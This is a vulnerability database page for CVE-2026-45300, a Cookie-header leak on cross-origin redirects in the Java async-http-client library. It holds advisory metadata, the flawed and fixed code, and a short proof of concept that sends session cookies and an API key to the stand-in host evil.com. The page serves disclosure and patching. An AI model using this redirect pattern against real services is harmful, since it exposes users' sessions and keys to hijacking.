Vulnerability-Lookup

CVE-2026-45300 (GCVE-0-2026-45300)

Vulnerability from cvelistv5 – Published: 2026-06-05 19:32 – Updated: 2026-06-08 16:34

Title

async-http-client: Cookie header not stripped on cross-origin redirect

Summary

The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. Versions on the 2.x branch prior to 2.15.0 and the 3.x branch prior to 3.0.10 leak `Cookie` headers to cross-origin redirect targets. When following a redirect to a different origin, the `propagatedHeaders()` method in `Redirect30xInterceptor.java` strips `Authorization` and `Proxy-Authorization` headers but does not strip the `Cookie` header, causing session cookies and other sensitive cookie values to be sent to attacker-controlled servers. Versions 2.15.0 and 3.0.10 patch the issue.

Severity

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

SSVC

Exploitation: poc Automatable: no Technical Impact: partial

CISA Coordinator (v2.0.3)

CWE

CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor

Assigner

GitHub_M

References

3 references

URL	Tags
https://github.com/AsyncHttpClient/async-http-cli…	x_refsource_CONFIRM
https://github.com/AsyncHttpClient/async-http-cli…	x_refsource_MISC
https://github.com/AsyncHttpClient/async-http-cli…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
AsyncHttpClient	async-http-client	Affected: >= 3.0.0.Beta1, < 3.0.10 Affected: >= 2.0.0, < 2.15.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-45300",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-06-08T14:33:01.603361Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-06-08T16:34:10.203Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/AsyncHttpClient/async-http-client/security/advisories/GHSA-fmxf-pm6p-7xgm"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "async-http-client",
          "vendor": "AsyncHttpClient",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 3.0.0.Beta1, \u003c 3.0.10"
            },
            {
              "status": "affected",
              "version": "\u003e= 2.0.0, \u003c 2.15.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. Versions on the 2.x branch prior to 2.15.0 and the 3.x branch prior to 3.0.10 leak `Cookie` headers to cross-origin redirect targets. When following a redirect to a different origin, the `propagatedHeaders()` method in `Redirect30xInterceptor.java` strips `Authorization` and `Proxy-Authorization` headers but does not strip the `Cookie` header, causing session cookies and other sensitive cookie values to be sent to attacker-controlled servers. Versions 2.15.0 and 3.0.10 patch the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-200",
              "description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-06-05T19:32:43.547Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/AsyncHttpClient/async-http-client/security/advisories/GHSA-fmxf-pm6p-7xgm",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/AsyncHttpClient/async-http-client/security/advisories/GHSA-fmxf-pm6p-7xgm"
        },
        {
          "name": "https://github.com/AsyncHttpClient/async-http-client/commit/3b0e3e9e",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/AsyncHttpClient/async-http-client/commit/3b0e3e9e"
        },
        {
          "name": "https://github.com/AsyncHttpClient/async-http-client/releases/tag/async-http-client-project-3.0.10",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/AsyncHttpClient/async-http-client/releases/tag/async-http-client-project-3.0.10"
        }
      ],
      "source": {
        "advisory": "GHSA-fmxf-pm6p-7xgm",
        "discovery": "UNKNOWN"
      },
      "title": "async-http-client: Cookie header not stripped on cross-origin redirect"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-45300",
    "datePublished": "2026-06-05T19:32:43.547Z",
    "dateReserved": "2026-05-11T20:14:43.202Z",
    "dateUpdated": "2026-06-08T16:34:10.203Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-45300",
      "date": "2026-06-08",
      "epss": "0.00029",
      "percentile": "0.08768"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-45300\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-06-05T20:17:31.893\",\"lastModified\":\"2026-06-08T18:37:41.620\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. Versions on the 2.x branch prior to 2.15.0 and the 3.x branch prior to 3.0.10 leak `Cookie` headers to cross-origin redirect targets. When following a redirect to a different origin, the `propagatedHeaders()` method in `Redirect30xInterceptor.java` strips `Authorization` and `Proxy-Authorization` headers but does not strip the `Cookie` header, causing session cookies and other sensitive cookie values to be sent to attacker-controlled servers. Versions 2.15.0 and 3.0.10 patch the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N\",\"baseScore\":7.4,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":4.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-200\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:asynchttpclient_project:async-http-client:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"2.0.0\",\"versionEndExcluding\":\"2.15.0\",\"matchCriteriaId\":\"AF0C317B-18A8-406E-BFF2-0EE6DA050379\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:asynchttpclient_project:async-http-client:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"3.0.0\",\"versionEndExcluding\":\"3.0.10\",\"matchCriteriaId\":\"BD280C21-CB2D-4169-ABD1-CBF918370B32\"}]}]}],\"references\":[{\"url\":\"https://github.com/AsyncHttpClient/async-http-client/commit/3b0e3e9e\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/AsyncHttpClient/async-http-client/releases/tag/async-http-client-project-3.0.10\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/AsyncHttpClient/async-http-client/security/advisories/GHSA-fmxf-pm6p-7xgm\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Patch\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/AsyncHttpClient/async-http-client/security/advisories/GHSA-fmxf-pm6p-7xgm\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Patch\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-45300\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-08T14:33:01.603361Z\"}}}], \"references\": [{\"url\": \"https://github.com/AsyncHttpClient/async-http-client/security/advisories/GHSA-fmxf-pm6p-7xgm\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-08T14:33:16.422Z\"}}], \"cna\": {\"title\": \"async-http-client: Cookie header not stripped on cross-origin redirect\", \"source\": {\"advisory\": \"GHSA-fmxf-pm6p-7xgm\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 7.4, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"AsyncHttpClient\", \"product\": \"async-http-client\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 3.0.0.Beta1, \u003c 3.0.10\"}, {\"status\": \"affected\", \"version\": \"\u003e= 2.0.0, \u003c 2.15.0\"}]}], \"references\": [{\"url\": \"https://github.com/AsyncHttpClient/async-http-client/security/advisories/GHSA-fmxf-pm6p-7xgm\", \"name\": \"https://github.com/AsyncHttpClient/async-http-client/security/advisories/GHSA-fmxf-pm6p-7xgm\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/AsyncHttpClient/async-http-client/commit/3b0e3e9e\", \"name\": \"https://github.com/AsyncHttpClient/async-http-client/commit/3b0e3e9e\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/AsyncHttpClient/async-http-client/releases/tag/async-http-client-project-3.0.10\", \"name\": \"https://github.com/AsyncHttpClient/async-http-client/releases/tag/async-http-client-project-3.0.10\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. Versions on the 2.x branch prior to 2.15.0 and the 3.x branch prior to 3.0.10 leak `Cookie` headers to cross-origin redirect targets. When following a redirect to a different origin, the `propagatedHeaders()` method in `Redirect30xInterceptor.java` strips `Authorization` and `Proxy-Authorization` headers but does not strip the `Cookie` header, causing session cookies and other sensitive cookie values to be sent to attacker-controlled servers. Versions 2.15.0 and 3.0.10 patch the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-200\", \"description\": \"CWE-200: Exposure of Sensitive Information to an Unauthorized Actor\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-06-05T19:32:43.547Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-45300\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-08T16:34:10.203Z\", \"dateReserved\": \"2026-05-11T20:14:43.202Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-06-05T19:32:43.547Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-45300

Vulnerability from fkie_nvd - Published: 2026-06-05 20:17 - Updated: 2026-06-08 17:16

Severity

7.4 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/AsyncHttpClient/async-http-client/commit/3b0e3e9e
	security-advisories@github.com	https://github.com/AsyncHttpClient/async-http-client/releases/tag/async-http-client-project-3.0.10
	security-advisories@github.com	https://github.com/AsyncHttpClient/async-http-client/security/advisories/GHSA-fmxf-pm6p-7xgm
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/AsyncHttpClient/async-http-client/security/advisories/GHSA-fmxf-pm6p-7xgm

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. Versions on the 2.x branch prior to 2.15.0 and the 3.x branch prior to 3.0.10 leak `Cookie` headers to cross-origin redirect targets. When following a redirect to a different origin, the `propagatedHeaders()` method in `Redirect30xInterceptor.java` strips `Authorization` and `Proxy-Authorization` headers but does not strip the `Cookie` header, causing session cookies and other sensitive cookie values to be sent to attacker-controlled servers. Versions 2.15.0 and 3.0.10 patch the issue."
    }
  ],
  "id": "CVE-2026-45300",
  "lastModified": "2026-06-08T17:16:44.070",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.4,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 4.0,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-06-05T20:17:31.893",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/AsyncHttpClient/async-http-client/commit/3b0e3e9e"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/AsyncHttpClient/async-http-client/releases/tag/async-http-client-project-3.0.10"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/AsyncHttpClient/async-http-client/security/advisories/GHSA-fmxf-pm6p-7xgm"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/AsyncHttpClient/async-http-client/security/advisories/GHSA-fmxf-pm6p-7xgm"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Undergoing Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-200"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-FMXF-PM6P-7XGM

Vulnerability from github – Published: 2026-05-18 16:42 – Updated: 2026-05-18 16:42

Summary

async-http-client: Cookie header not stripped on cross-origin redirect

Details

Summary

async-http-client leaks Cookie headers to cross-origin redirect targets. When following a redirect across a security boundary (different origin, or HTTPS→HTTP downgrade), the propagatedHeaders() method in Redirect30xInterceptor.java strips Authorization and Proxy-Authorization headers but does not strip Cookie, so session cookies and other sensitive cookie values are forwarded to the redirect target — which may be attacker-controlled.

Details

The vulnerability is in client/src/main/java/org/asynchttpclient/netty/handler/intercept/Redirect30xInterceptor.java.

The caller computes stripAuth on each redirect:

boolean sameBase    = request.getUri().isSameBase(newUri);
boolean stripAuth   = !sameBase || schemeDowngrade || stripAuthorizationOnRedirect;
// ...
requestBuilder.setHeaders(propagatedHeaders(request, realm, keepBody, stripAuth));

stripAuth is true whenever the redirect crosses an origin, downgrades the scheme, or the caller opted in via AsyncHttpClientConfig#isStripAuthorizationOnRedirect().

In the vulnerable version, propagatedHeaders() only removes Authorization and Proxy-Authorization in that branch — Cookie is left untouched:

private static HttpHeaders propagatedHeaders(Request request, Realm realm, boolean keepBody, boolean stripAuthorization) {
    HttpHeaders headers = request.getHeaders()
            .remove(HOST)
            .remove(CONTENT_LENGTH);

    if (!keepBody) {
        headers.remove(CONTENT_TYPE);
    }

    if (stripAuthorization || (realm != null && (realm.getScheme() == AuthScheme.NTLM
            || realm.getScheme() == AuthScheme.SCRAM_SHA_256))) {
        headers.remove(AUTHORIZATION)
                .remove(PROXY_AUTHORIZATION);
        // BUG: COOKIE is not removed here, so cookies leak across the security boundary.
    }
    return headers;
}

The companion test class RedirectCredentialSecurityTest covers Authorization / Proxy-Authorization stripping on cross-origin redirects and scheme downgrades, but has no coverage for Cookie, which is why the regression went unnoticed.

Proof of concept

import org.asynchttpclient.*;

AsyncHttpClient client = asyncHttpClient();

// trusted-api.com responds 302 -> https://evil.com
Request request = new RequestBuilder("GET")
        .setUrl("https://trusted-api.com/endpoint")
        .setHeader("Cookie", "session=abc123; csrf=xyz789; api_key=secret")
        .setHeader("Authorization", "Bearer token123")
        .build();

client.executeRequest(request).get();

// Request seen by evil.com after the redirect:
//   Authorization: <stripped>
//   Cookie:        session=abc123; csrf=xyz789; api_key=secret   <-- leaked

Impact

Session hijacking — leaked session cookies allow impersonation.
CSRF token theft — CSRF tokens carried in cookies are disclosed.
API key theft — API keys stored in cookies are disclosed.
Privacy — tracking identifiers leak to third-party origins.

Realistic attack paths:

Open-redirect in a trusted API endpoint.
Compromised CDN or API gateway injecting redirects.
MITM on a plaintext hop in the redirect chain.

Fix

Add COOKIE to the headers removed alongside AUTHORIZATION / PROXY_AUTHORIZATION on the security-boundary branch:

if (stripAuthorization) {
    headers.remove(AUTHORIZATION)
            .remove(PROXY_AUTHORIZATION)
            .remove(COOKIE);
} else if (realm != null && (realm.getScheme() == AuthScheme.NTLM
        || realm.getScheme() == AuthScheme.SCRAM_SHA_256)) {
    headers.remove(AUTHORIZATION)
            .remove(PROXY_AUTHORIZATION);
}

Note that the URI-scoped CookieStore will re-add any cookies that legitimately match the new target after propagatedHeaders returns, so legitimate cross-origin sessions tracked by the client are not broken.

Fixed in 3.0.10 and 2.15.0 by commit 3b0e3e9e.

Severity

7.4 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.asynchttpclient:async-http-client"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0.Beta1"
            },
            {
              "fixed": "3.0.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.asynchttpclient:async-http-client"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.15.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45300"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-18T16:42:20Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nasync-http-client leaks `Cookie` headers to cross-origin redirect targets. When following a redirect across a security boundary (different origin, or HTTPS\u2192HTTP downgrade), the `propagatedHeaders()` method in `Redirect30xInterceptor.java` strips `Authorization` and `Proxy-Authorization` headers but does not strip `Cookie`, so session cookies and other sensitive cookie values are forwarded to the redirect target \u2014 which may be attacker-controlled.\n\n## Details\n\nThe vulnerability is in `client/src/main/java/org/asynchttpclient/netty/handler/intercept/Redirect30xInterceptor.java`.\n\nThe caller computes `stripAuth` on each redirect:\n\n```java\nboolean sameBase    = request.getUri().isSameBase(newUri);\nboolean stripAuth   = !sameBase || schemeDowngrade || stripAuthorizationOnRedirect;\n// ...\nrequestBuilder.setHeaders(propagatedHeaders(request, realm, keepBody, stripAuth));\n```\n\n`stripAuth` is `true` whenever the redirect crosses an origin, downgrades the scheme, or the caller opted in via `AsyncHttpClientConfig#isStripAuthorizationOnRedirect()`.\n\nIn the vulnerable version, `propagatedHeaders()` only removes `Authorization` and `Proxy-Authorization` in that branch \u2014 `Cookie` is left untouched:\n\n```java\nprivate static HttpHeaders propagatedHeaders(Request request, Realm realm, boolean keepBody, boolean stripAuthorization) {\n    HttpHeaders headers = request.getHeaders()\n            .remove(HOST)\n            .remove(CONTENT_LENGTH);\n\n    if (!keepBody) {\n        headers.remove(CONTENT_TYPE);\n    }\n\n    if (stripAuthorization || (realm != null \u0026\u0026 (realm.getScheme() == AuthScheme.NTLM\n            || realm.getScheme() == AuthScheme.SCRAM_SHA_256))) {\n        headers.remove(AUTHORIZATION)\n                .remove(PROXY_AUTHORIZATION);\n        // BUG: COOKIE is not removed here, so cookies leak across the security boundary.\n    }\n    return headers;\n}\n```\n\nThe companion test class `RedirectCredentialSecurityTest` covers `Authorization` / `Proxy-Authorization` stripping on cross-origin redirects and scheme downgrades, but has no coverage for `Cookie`, which is why the regression went unnoticed.\n\n## Proof of concept\n\n```java\nimport org.asynchttpclient.*;\n\nAsyncHttpClient client = asyncHttpClient();\n\n// trusted-api.com responds 302 -\u003e https://evil.com\nRequest request = new RequestBuilder(\"GET\")\n        .setUrl(\"https://trusted-api.com/endpoint\")\n        .setHeader(\"Cookie\", \"session=abc123; csrf=xyz789; api_key=secret\")\n        .setHeader(\"Authorization\", \"Bearer token123\")\n        .build();\n\nclient.executeRequest(request).get();\n\n// Request seen by evil.com after the redirect:\n//   Authorization: \u003cstripped\u003e\n//   Cookie:        session=abc123; csrf=xyz789; api_key=secret   \u003c-- leaked\n```\n\n## Impact\n\n- **Session hijacking** \u2014 leaked session cookies allow impersonation.\n- **CSRF token theft** \u2014 CSRF tokens carried in cookies are disclosed.\n- **API key theft** \u2014 API keys stored in cookies are disclosed.\n- **Privacy** \u2014 tracking identifiers leak to third-party origins.\n\nRealistic attack paths:\n\n- Open-redirect in a trusted API endpoint.\n- Compromised CDN or API gateway injecting redirects.\n- MITM on a plaintext hop in the redirect chain.\n\n## Fix\n\nAdd `COOKIE` to the headers removed alongside `AUTHORIZATION` / `PROXY_AUTHORIZATION` on the security-boundary branch:\n\n```java\nif (stripAuthorization) {\n    headers.remove(AUTHORIZATION)\n            .remove(PROXY_AUTHORIZATION)\n            .remove(COOKIE);\n} else if (realm != null \u0026\u0026 (realm.getScheme() == AuthScheme.NTLM\n        || realm.getScheme() == AuthScheme.SCRAM_SHA_256)) {\n    headers.remove(AUTHORIZATION)\n            .remove(PROXY_AUTHORIZATION);\n}\n```\n\nNote that the URI-scoped `CookieStore` will re-add any cookies that legitimately match the new target after `propagatedHeaders` returns, so legitimate cross-origin sessions tracked by the client are not broken.\n\nFixed in **3.0.10** and **2.15.0** by commit [`3b0e3e9e`](https://github.com/AsyncHttpClient/async-http-client/commit/3b0e3e9e).",
  "id": "GHSA-fmxf-pm6p-7xgm",
  "modified": "2026-05-18T16:42:20Z",
  "published": "2026-05-18T16:42:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/AsyncHttpClient/async-http-client/security/advisories/GHSA-fmxf-pm6p-7xgm"
    },
    {
      "type": "WEB",
      "url": "https://github.com/AsyncHttpClient/async-http-client/commit/3b0e3e9e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/AsyncHttpClient/async-http-client"
    },
    {
      "type": "WEB",
      "url": "https://github.com/AsyncHttpClient/async-http-client/releases/tag/async-http-client-project-3.0.10"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "async-http-client: Cookie header not stripped on cross-origin redirect"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-45300 (GCVE-0-2026-45300)

FKIE_CVE-2026-45300

GHSA-FMXF-PM6P-7XGM

Summary

Details

Proof of concept

Impact

Fix

Tags

Sightings

Nomenclature